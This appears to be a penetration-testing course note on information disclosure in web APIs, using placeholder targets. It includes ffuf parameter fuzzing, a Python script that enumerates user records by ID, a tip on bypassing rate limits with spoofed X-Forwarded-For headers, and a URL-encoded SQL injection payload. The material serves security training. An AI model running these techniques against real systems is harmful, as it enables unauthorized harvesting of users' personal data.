# Information Disclosure
Security-related inefficiencies or misconfigurations in a web service or API can result in information disclosure.

When assessing a web service or API for information disclosure, we should spend considerable time on fuzzing.
## Information Disclosure through Fuzzing
Suppose we are assessing an API residing in `http://<TARGET IP>:3003`.

Maybe there is a parameter that will reveal the API's functionality. Let us perform parameter fuzzing using _ffuf_ and the [burp-parameter-names.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt) list, as follows:
```shell
ffuf -w "/home/htb-acxxxxx/Desktop/Useful Repos/SecLists/Discovery/Web-Content/burp-parameter-names.txt" -u 'http://<TARGET IP>:3003/?FUZZ=test_value' -fs 19
```
- We notice a similar response size in every request, so we can use `-fs` to filter out the response size

It looks like _id_ is a valid parameter. Let us check the response when specifying _id_ as a parameter and a test value.
```shell
curl http://<TARGET IP>:3003/?id=1
```
- We get the id, username, and position of user with `id=1`

We can create a Python script that could automate retrieving all information that the API returns (save it as `brute_api.py`):
```python
import requests, sys

def brute():
    try:
        value = range(10000)
        for val in value:
            url = sys.argv[1]
            r = requests.get(url + '/?id='+str(val))
            if "position" in r.text:
                print("Number found!", val)
                print(r.text)
    except IndexError:
        print("Enter a URL E.g.: http://<TARGET IP>:3003/")

brute()
```
- We import two modules _requests_ and _sys_. 
	- _requests_ allows us to make HTTP requests (GET, POST, etc.),
	- _sys_ allows us to parse system arguments.
- We define a function called _brute_, and then we define a variable called _value_ which has a range of _10000_. _try_ and _except_ help in exception handling.
- _url = sys.argv[1]_ receives the first argument.
- _r = requests.get(url + '/?id='+str(val))_ creates a response object called _r_ which will allow us to get the response of our GET request. We are just appending _/?id=_ to our request and then _val_ follows, which will have a value in the specified range.
- _if "position" in r.text:_ looks for the _position_ string in the response. If we enter a valid ID, it will return the position and other information. If we don't, it will return _[]_.

We can now run this script:
```shell
python3 brute_api.py http://<TARGET IP>:3003
```

> **TIP**: If there is a rate limit in place, you can always try to bypass it through headers such as X-Forwarded-For, X-Forwarded-IP, etc., or use proxies.
## Information Disclosure through SQL Injection
We can also submit classic SQLi payloads to test for SQLi.

At the end of our curl request, we can add a payload such as `'OR 1=1' OR 1` and URL encode:
```
curl http://<TARGET IP>:3003/?id=1%27%4f%52%20%31%3d%31%27%20%4f%52%20%31%0a
```

We can use the [[/Offensive Security Techniques/Web Exploitation Techniques/SQL Injection/]] page to test for more SQLi in real scenarios.